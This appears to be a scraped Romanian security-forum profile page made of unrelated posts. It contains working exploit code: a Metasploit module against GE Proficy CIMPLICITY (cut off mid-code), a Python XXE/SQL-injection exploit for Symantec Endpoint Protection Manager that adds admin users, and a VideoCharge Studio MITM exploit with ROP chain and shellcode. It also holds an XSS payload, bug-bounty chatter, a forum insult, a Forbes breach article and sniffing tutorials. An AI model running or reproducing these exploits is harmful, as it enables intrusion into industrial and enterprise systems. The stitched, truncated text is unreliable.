sensi

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML def initialize super( 'Name' => 'GE Proficy CIMPLICITY gefebt.exe Remote Code Execution', 'Description' => %q{ This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in shared resources. An attacker can abuse this behaviour to execute a malicious BCL and drop an arbitrary EXE. The last one can be executed remotely through the WebView server. This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. When the target hasn't the WebClient service enabled, an external SMB service is necessary. }, 'Author' => [ 'amisto0x07', # Vulnerability discovery 'Z0mb1E', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2014-0750'], [ 'ZDI', '14-015' ], [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01' ] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Platform' => 'win', 'Targets' => [ [ 'GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)', { } ] ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'Jan 23 2014' ) register_options( [ Opt::RPORT(80), OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]), OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]), OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]), OptBool.new('ONLYMAKE', [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]), OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/']) ], self.class) end def on_request_uri(cli, request) case request.method when 'OPTIONS' process_options(cli, request) when 'PROPFIND' process_propfind(cli, request) when 'GET' process_get(cli, request) else vprint_status("#{request.method} => 404 (#{request.uri})") resp = create_response(404, "Not Found") resp.body = "" resp['Content-Type'] = 'text/html' cli.send_response(resp) end end def process_get(cli, request) if request.uri =~ /# @exe_filename) uri << "?" # Enough timeout to execute the payload, but don't block the exploit # until there is an answer. send_request_cgi({'uri' => uri}, 3) end def primer exploit_bcl service.stop end def file_create(fname, data) ltype = "exploit.fileformat.#{self.shortname}" full_path = store_local(ltype, nil, data, fname) print_good("#{fname} stored at #{full_path}") end end

• Exploit: *.microsoft.com - Cross Site Scripting (reflected) • Author: sensi • Tested on: Mozilla Firefox • Status: Reported • PoC:

Bai bajeti, stergeti cookie & cache si o sa mearga, cel putin la mine asa am rezolvat problema (Firefox).

import argparse import httplib """ Exploit Title: Symantec Endpoint Protection Manager Remote Command Execution Exploit Author: Chris Graham @cgrahamseven CVE: CVE-2013-5014, CVE-2013-5015 Date: February 22, 2014 Vendor Homepage: http://www.symantec.com/endpoint-protection Version: 11.0, 12.0, 12.1 Tested On: Windows Server 2003, default SEPM install using embedded database References: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00 Details: First off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE injection to force SEPM to exploit itself through a separate SQL injection flaw was particularly amusing. I suspect the majority of SEPM users will have it configured with the default embedded database, thereby making this a pretty reliable exploit. So basically what you are looking for with the XXE injection is a vulnerability that can be triggered in the ConsoleServlet. When a multipart http request is sent, the servlet will use a custom MultipartParser class to handle the individual multipart bodies. When a body is encountered that uses a Content-Type of text/xml, the Java DocumentBuilder class is used to parse the xml. Since Symantec did not disallow declared DTD processing, it is vulnerable to the XXE injection. This appears to be a blind XXE, so a better use of the vulnerability is use it for SSRF. That leads us to the SQL injection flaw. Symantec has an http request handler called ConfigServerHandler that is programmatically restricted to only handle requests that come from localhost. I guess when they wrote this they just assumed that there was never going to be a way to send untrusted input to it since it was always going to be controlled by them. I base this guess on the fact that there is absolutely no attempt made to validate what input comes in to the updateReportingVersion function which shoves it directly into a SQL query unfiltered. In order to trigger the SQL injection you just need to send the SQL injection string in the "Parameter" url param with the "action" param set to test_av. On a default install of SEPM, it uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell stored procedure to run local OS commands. Using this stored procedure, you can compromise the server that is running SEPM. Example Usage: python sepm_xxe_exploit.py -t 192.168.1.100 -c "net user myadmin p@ss!23 /add" python sepm_xxe_exploit.py -t 192.168.1.100 -c "net localgroup Administrators myadmin /add" """ multipart_body = \ "------=_Part_156_33010715.1234\r\n" + \ "Content-Type: text/xml\r\n" + \ "Content-Disposition: form-data; name=\"Content\"\r\n\r\n" + \ "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n" + \ "<!DOCTYPE sepm [<!ENTITY payload SYSTEM " + \ "\"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av" + \ "&SequenceNum=140320121&Parameter=a'; call xp_cmdshell('%s');--\" >]>\r\n" + \ "<request>\r\n" + \ "<xxe>&payload;</xxe>\r\n" + \ "</request>\r\n" + \ "------=_Part_156_33010715.1234--\r\n" headers = {'Content-Type':"multipart/form-data; boundary=\"----=_Part_156_33010715.1234\""} cmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \ ' Remote Command Execution') cmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True) cmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \ type=int, required=False) cmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \ default=0, type=int, required=False) cmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie "net user")', \ required=True) args = cmdline_parser.parse_args() if args.ssl == 1: conn = httplib.HTTPSConnection(args.ip, args.port) else: conn = httplib.HTTPConnection(args.ip, args.port) multipart_body = multipart_body % (args.cmd) print "\n[*]Attempting to exploit XXE and run local windows command: " + args.cmd conn.request("POST", "/servlet/ConsoleServlet?ActionType=ConsoleLog", multipart_body, headers) res = conn.getresponse() if res.status != 200: print "[-]Exploit unsuccessful! Server returned:\n" + res.read() else: print "[+]Exploit successfully sent!" source

@Reckon, bai baiatule nu te saturi de atata ban? Apropo, exista o limita de ban pentru cei cu statut de V.I.P? Sau putem primi 1000 de ban-uri si sa profitam in continuare de acest privilegiu? Din cate stiu eu ban-ul se primeste pentru incalcarea regulilor. Ce exemplu poate da un membru cu acest statut celorlalti membri? Am specificat ca (,) canalul nu este al meu, deci orice om cu putin creier isi poate da seama ca nici text-ul nu este scris de mine (dezacordurile). Mai citeste o data (4,5,6 ori) ce ai scris, te contrazici singur . Daca tot voiai sa afli mai multe imi puteai da p.m si te puneam in contact cu persoana respectiva, care pana la urma e tot un prieten d'al tau. Infine, nu stiu ce-s cu iesirile astea, ai sarit ca ars, probabil te afecteaza prea mult mediul virtual, mai iesi in plm afara virginule! ps: Ce level ai la meting?

Nu este canalul meu, ci al unui prieten, il ajut sa isi promoveze canalul (esti dator uratule). Cyber Code este un canal de programare, pana acum avem 2 lectii video, va urma sa postez si in zilele urmatoare mai multe lecti. Video-uri: C# - Limbaj de Programare (Metode) C# - Limbaj de Programare (Variabile)Canal : http://www.youtube.com/user/CyberCode0?feature=c4-feed-u Va rog sa va abonati, dati un subscribe, ridicati o manuta si alea alea, ma ajuta chestile astea.

VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit #!/usr/bin/python # Exploit Title: VideoCharge Studio v2.12.3.685 GetHttpResponse() MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass) # Version: v2.12.3.685 # Date: 2014-02-19 # Author: Julien Ahrens (@MrTuxracer) # Homepage: http://www.rcesecurity.com # Software Link: http://www.videocharge.com # Tested on: Win7-GER (DEP enabled) # # Howto / Notes: # Since it's a MITM RCE you need to spoof the DNS Record for www.videocharge.com in order to successfully exploit this vulnerability # from socket import * from struct import pack from time import sleep host = "192.168.0.1" port = 80 s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\n[+] Listening on %d ..." % port cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0] # Thanks Giuseppe D'Amore for the amazing shellcode # http://www.exploit-db.com/exploits/28996/ shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+ "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+ "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+ "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+ "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+ "\x49\x0b\x31\xc0\x51\x50\xff\xd7") junk0 = "\x90" * 1277 junk1 = "\x90" * 1900 nops="\x90" * 30 jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ} [cc.dll] # jump to controlled memory eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN [zlib1.dll] # # ROP registers structure: # EBP - VirtualProtect() call # ESP - lpAddress # EBX - dwSize # EDX - flNewProtect # ECX - lpflOldProtect # # Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF] and MOV to EBP rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll] rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll] rop += pack('<L',0xDE2D66F9) # XOR param 1 rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll] rop += pack('<L',0xDEADBEEF) # XOR param 2 rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] # RETN [cc.dll] rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll] rop += pack('<L',0xDEADBEEF) # Filler rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll] # Craft VirtualProtect() dwSize in EAX and MOV to EBX rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll] rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll] rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll] # Craft VirtualProtect() flNewProtect in EAX and MOV to EDX rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll] rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll] rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll] rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll] rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll] rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll] rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll] # Put writable offset for VirtualProtect() lpflOldProtect to ECX rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll] rop += pack('<L',0x61B96180) # writable location [zlib1.dll] # POP a value from the stack after PUSHAD and POP value to ESI # as a preparation for the VirtualProtect() call rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll] rop += pack('<L',0x61B96180) # writable location from [zlib1.dll] rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll] rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll] # Achievement unlocked: PUSHAD rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll] rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll] payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode buffer = "HTTP/1.1 200 OK\r\n" buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n" buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n" buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n" buffer += "Vary: Accept-Encoding\r\n" buffer += "Content-Length: 4000\r\n" buffer += "Connection: close\r\n" buffer += "Content-Type: text/html\r\n\r\n" buffer += payload buffer += "\r\n" print cl.recv(1000) cl.send(buffer) print "[+] Sending exploit: OK\n" sleep(3) cl.close() s.close() source

Forbes.com has become the latest media outlet to fall to an attack by the Syrian Electronic Army (SEA) with the account records of more than a million people swiped. A database containing email address and password combinations for 1,071,963 accounts was dumped online by the hacktivisits – including the records for Forbes contributors. Although the passwords were one-way encrypted, the publisher strongly urged its readers to change their login secrets. The team added: The email address for anyone registered with Forbes.com has been exposed. Please be wary of emails that purport to come from Forbes, as the list of email addresses may be used in phishing attacks. We have notified law enforcement. We take this matter very seriously and apologize to the members of our community for this breach. Just how exactly did Forbes protect its punters' passwords? After looking through the data, Sophos reckoned the site stored the information in the PHPass Portable format: each password and a random 6-byte salt were together run through the MD5 algorithm to generate a hash, and 8,192 iterations of MD5 were performed on the hash and the password. The final result was saved to the database. Users with particularly trivial passwords will be vulnerable to a dictionary attack; although the use of salt will slow down a miscreant, MD5 is hopelessly weak. The attackers can, say, combine the password “123456” with a particular user's salt and quickly generate a hash to check against that user's database entry. If it matches, the password is revealed; if not, try again with another similarly crap password. Now that the data is out there, people who used their Forbes.com email address and password combination to log into various other websites are at risk of losing control of multiple web accounts. "It took about an hour, using one core of a vanilla laptop, to crack close to one-quarter of the passwords of the 500 or so Forbes employees in the database," said Sophos' Paul Ducklin. "Astonishingly, 73 Forbes staffers (more than one-eighth of the list) had chosen a password consisting of their company's name, Forbes, followed by zero to four digits. 1 and 123 were the most common suffixes.” Three online articles were defaced by the SEA as proof it carried out the database raid, and at the time of writing, Forbes' blog sites remain out of action. ® source

Poti posta vectorul sa vedem si noi cat de "1337" e? // Felicitari!

The first thing I recommend you to do before you start sniffing is to ensure that your sniffer computer stays quiet, so that you don't pollute the sniffed traffic with packets from your sniffer computer. How to do this varies between Windows, Linux and FreeBSD, so I will briefly cover how to silence all three OS's. Silencing Windows Windows is normally quite chatty on the network, but there is a simple trick that makes it shut up without disconnecting it from the network. Simply bring up the properties window for your network adapter and un-check all clients, services and protocols from the list of used items. Silencing Linux I don't know any good way to disable the TCP/IP stack in Linux similar to what we just did to Windows. But by disabling ARP and not giving the interface any IP address the risk of leaking packets can be reduced significantly. To achieve this simply run these commands on your Linux machine: # ifconfig eth0 promisc # ifconfig eth0 -arp up # ip addr del 192.168.3.4/24 dev eth0 # ifconfig eth0 del fe80::1234:ddff:fe3f:1337/64 Silencing FreeBSD One of the many great things about FreeBSD is that it is really easy to configure a network interface to be silent. All you need to do is to issue this single command: # ifconfig em0 monitor up Sniff with dumpcap The most common software used for sniffing traffic is undoubtedly Wireshark, other common tools are tshark and tcpdump. All these three tools parse the packets as they come in and show data about the sniffed packets in the GUI or on the command line. This isn't desirable when doing network forensics since these application could use up too much resources on parsing the incoming packets, which during traffic peaks can lead to packets being dropped. There might also be bugs in the packet parsing code that can cause the application to crash completely, there have been plenty of such bugs in Wireshark for example. A much more reliable way to sniff traffic is therefore to use an application that is designed to reliably dump traffic to disk, without trying to parse or analyze the contents of the sniffed frames. One such application is dumpcap, which is a command line tool developed by the Wireshark crew. In fact, as of version 1.4.0 of Wireshark both tshark and Wireshark run dumpcap in the background rather than doing the sniffing themselves. Another great thing about dumpcap is that it is available on Windows as well as on Linux and FreeBSD. My recommendation is to run it under FreeBSD since I consider it to be more reliable than the other operating systems. In order to get dumcap you need to download either Wirehsark or tshark since dumpcap doesn't have an installation package of its own. Dumpcap supports capture filtering with BPF, but I recommend that you sniff ALL packets if you are authorized to do so and have enough disk space. It is much better to do the filtering later on in the analysis phase. The feature I like best in dumpcap is the ring buffer functionality, where it will continue writing incoming frames to a new pcap file once the old one has reached a specific size limit. In order to have dumpcap write sniffed frames to disk and roll over to a new file when it reaches 100.000 kB you'd run this command: # dumpcap -i em0 -w wiretap.pcap -b filesize:100000 When you've dumped the traffic to disk is when the fun starts, i.e. analyzing the pcap files. source

Many “n00bs” fire up Wireshark on their own PC expecting to be able to sniff all traffic passing through an Ethernet network. But the 90's are long gone, and all hubs have been replaced by switches, so your NIC nowadays only gets broadcast packets and packets addressed to your NIC. So if you wanna capture traffic from other hosts on the network you somehow need to force that traffic to passes by your NIC. I will here explain some of the most usual ways to achieve this. Use a legacy “dumb” hub The good ol' dumb hubs (a.k.a. active hubs) are hard to find these days, but if you're fortunate enough to own one of those old jewels then make sure to hold on to it. You might also get lucky and find a used hub on ebay. These beauties repeat all Ethernet frames arriving at one port to all the other ports on the hub, which is just what we want in order to sniff all the traffic. Just place the hub at a choke-point in your network, for example between your firewall and the rest of the network, and connect your sniffer PC directly to the hub (see my ASCII image below). One downside of using a hub is that all these extra packets being sent on all the hub's ports increase the risk of packet collisions, i.e. when two nodes on a shared media network are transmitting at the same time. Every time a collision occurs on an Ethernet network the nodes on the shared media segment will pause for a random time before they continue sending data, this functionality is called CSMA/CD. For TCP based protocols such collisions result in lots of ugly retransmissions, while the data in collided UDP packets never will reach their destination since UDP doesn't support retransmissions. Configure a monitor port on a managed switch A much better solution than using a hub is to configure a monitor port on a managed switch, from which you wish to tap some traffic. Monitor ports have different names depending on the vendor, Cisco call theirs SPAN ports, others use the term “port mirroring”. A monitor port is typically configured so that it copies all sent and received frames for a particular port to a monitor port, which is where you connect your sniffer. You can normally also configure the switch to copy traffic from all ports to the monitor port, but this can cause duplicate packets since each packet will be copied both when coming in on one port as well as when it goes out on another port. It is therefore usually better to monitor only the uplink port if you wish to monitor all hosts connected to a switch. The major downside of sniffing traffic of a monitor port is that the primary functionality of a switch is to forward traffic from the sender to the receiver, not to send copies of that traffic to a monitor port. This means that if there is a high load on the switch it will prioritize sending the received frames to the recipient over copying them to the monitor port. You therefore run the risk of not always getting all transmitted packets to your monitor port, which might be acceptable in some situations but isn't acceptable in a network forensics investigation. Finding out if your monitor port has missed some packets isn't easy, but Charles Smutz explains how this can be done in his blog post “Flushing out Leaky Taps”. Network Tap The most reliable way to sniff traffic is to use a network tap. A network tap is a “bump-in-the-wire” device designed only to copy traffic passing through it to a monitor port. You typically insert a network tap inline between two nodes in a network, such as between your firewall and your first switch. A good network tap will cost you at least 1.000 EUR, but those are money well spent if you wanna be able to perform reliable network monitoring. If you're planning to buy a network tap I recommend getting a link aggregation tap, which can merge uplink and downlink traffic to one single monitor port. This way you don't need two network interfaces on your sniffer PC. Both major tap vendors Net Optics and VSS Monitoring sell aggregation taps. A downside of using a network tap compared to configuring a monitor port is that there will be a short downtime on the network while connecting and disconnecting the tap. I therefore recommend to install network taps when you have a service window. And when you have a tap connected at a good choke-point in your network I recommend that you leave it there after you're done, since you never know when you might need to come back and sniff some more. ARP poisoning A technique commonly used by hackers and penetration testers for getting hold of traffic in a switched environment is to use ARP poisoning. Basically ARP poisoning is a technique where two hosts on a network are tricked into sending packets destined for each other to a sniffer machine on the network. I'm not gonna describe this method in any more detail than so since ARP poisoning is a technique that I don't recommend using. Tools used for performing ARP poisoning are hacker tools like Cain & Abel and Ettercap. Another similar technique that I also don't recommend using is overflowing the CAM table. source

(more)

Poti face plata prin pm?

L-au reparat, dar nu ti-au raspuns ?

Mersi, am mai raportat si o vulnerabilitate de tip YQL, astept sa-mi raspunda

Hi, I used "><img src=x onerror=prompt(1)>

Multumesc! Si da, l-am raportat.

• Exploit: *.yahoo.com - Cross Site Scripting (reflected) • Author: sensi • Tested on: Mozilla Firefox • Status: Reported • PoC: http://iceimg.com/bkET8egQ/showoff.png

Stiam de faza, dar am uitat ca am cont... // Baieti, cand mai raportati vulnerabilitati, raportati de pe un mail d'asta, poate nu mai dau baietii asa usor duplicate

Paypal uimeste din nou

Ma tinea in suspans titlul.

Ba da, tot ceva cu /*...astept sa-mi raspunda.

Ba da. akkiliON a raportat un SCD + URL redirection si a primit reward. //@askwrite, nu.

• Exploit: *.yahoo.com - URL redirection • Author: sensi • Status: Reported • PoC:

Se pare ca mi-au validat xss-ul